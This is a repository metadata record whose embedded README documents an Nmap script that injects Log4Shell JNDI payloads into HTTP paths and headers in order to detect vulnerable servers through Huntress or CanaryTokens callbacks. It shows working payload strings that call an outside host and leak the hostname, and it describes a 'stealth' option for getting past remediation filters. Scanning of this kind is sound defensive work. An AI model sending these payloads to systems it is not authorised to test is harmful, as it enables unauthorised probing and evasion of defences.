{"id":13296900,"url":"https://github.com/righel/log4shell_nse","last_synced_at":"2025-06-26T02:37:51.233Z","repository":{"id":45453407,"uuid":"437265470","full_name":"righel/log4shell_nse","owner":"righel","description":"nse script to inject jndi payloads","archived":false,"fork":false,"pushed_at":"2021-12-13T14:58:03.000Z","size":17,"stargazers_count":46,"open_issues_count":0,"forks_count":10,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-10T09:41:58.721Z","etag":null,"topics":["cve","log4j","log4shell","nmap"],"latest_commit_sha":null,"homepage":"","language":"Lua","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/righel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-11T11:39:36.000Z","updated_at":"2025-01-28T05:22:41.000Z","dependencies_parsed_at":"2022-08-04T12:30:10.911Z","dependency_job_id":null,"html_url":"https://github.com/righel/log4shell_nse","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/righel/log4shell_nse","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/righel","download_url":"https://codeload.github.com/righel/log4shell_nse/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms
/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261988019,"owners_count":23240951,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","log4j","log4shell","nmap"],"created_at":"2024-07-29T17:21:17.964Z","updated_at":"2025-06-26T02:37:51.213Z","avatar_url":"https://github.com/righel.png","language":"Lua","readme":"## log4shell.nse\nInjects a Huntress/CanaryTokens/custom log4shell payload in HTTP requests described by JSON templates.\nResults expire after 30 minutes.\n\n### Sample usage\n```\n$ nmap --script log4shell.nse --script-args id=\u003cuuid\u003e,mode=huntress -p 80 localhost\nStarting Nmap 7.80 ( https://nmap.org ) at 2021-12-11 12:43 CET\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000059s latency).\n\nPORT   STATE SERVICE\n80/tcp open  http\n|_log4shell: Check https://log4shell.huntress.com/view/\u003cuuid\u003e for results.\n\nNmap done: 1 IP address (1 host up) scanned in 0.13 seconds\n```\n\n### Options\n* `id`: Unique id linked with this scan.\n* `mode`: Payload template, one of `huntress`, `canary_tokens` or `custom`.\n* `payload`: Specify a custom payload; it should include `%s`, which is replaced with the unique id of this scan.\n* `stealth`: Bypass initial remediation methods by masking `ldap` in the payload; this may cause the payload to execute multiple times.\n* `templates`: Path to a custom JSON templates file. 
\n\n\n### Examples\n\n* Huntress:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=huntress -p http* 127.0.0.1\n```\n\n* CanaryTokens:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=canary_tokens -p http* 127.0.0.1\n```\n\n* Custom payload:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=custom,payload=\"jndi:dns:/%s.tracker.com\" -p http* 127.0.0.1\n```\n\n### Templates\nThe script sends the payload according to the template config. Many templates can be defined in a single JSON template file; this results in multiple requests being sent to each target.\n\n\nThe following example will send a single `HTTP` `GET` request for each port `Nmap` detected as open.\n\n* It's recommended to use the `-p http*` option when running `Nmap` so we don't spam ports that do not speak `http`.\n\nConfigurable template properties:\n* `id`: Unique identifier of the template.\n* `name`: Name of the template.\n* `method`: HTTP verb for the request (`GET`, `HEAD`, `POST`, `PUT`, ...), default: `\"GET\"`.\n* `path`: URI to send the request to; any query string parameters should be added here, default: `\"/\"`.\n* `headers`: Array of headers to send with the request.\n* `body`: Body of the request, especially when using `POST`/`PUT`/... 
methods.\n\n**Example:**\n```json\n[\n    {\n        \"id\": \"1\",\n        \"name\": \"sample-template\",\n        \"method\": \"GET\",\n        \"path\": \"/{payload}?utm_source={payload}\",\n        \"headers\": [\n            {\n                \"name\": \"User-Agent\",\n                \"format\": \"{payload}\"\n            },\n            {\n                \"name\": \"Referer\",\n                \"format\": \"{payload}\"\n            },\n            {\n                \"name\": \"Cookie\",\n                \"format\": \"JSESSIONID={payload}\"\n            }\n        ]\n    }\n]\n```\nThis will result in the following http request:\n```\nHTTP GET /${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}?utm_source=${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nHeaders:\nConnection: close\nUser-Agent: ${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nCookie: JSESSIONID=${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nReferer: ${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nHost: localhost:7800\n```\n\n\n\nReferences:\n- https://log4shell.huntress.com/\n- https://canarytokens.org/generate\n- https://www.lunasec.io/docs/blog/log4j-zero-day/\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frighel%2Flog4shell_nse","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frighel%2Flog4shell_nse","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frighel%2Flog4shell_nse/lists"}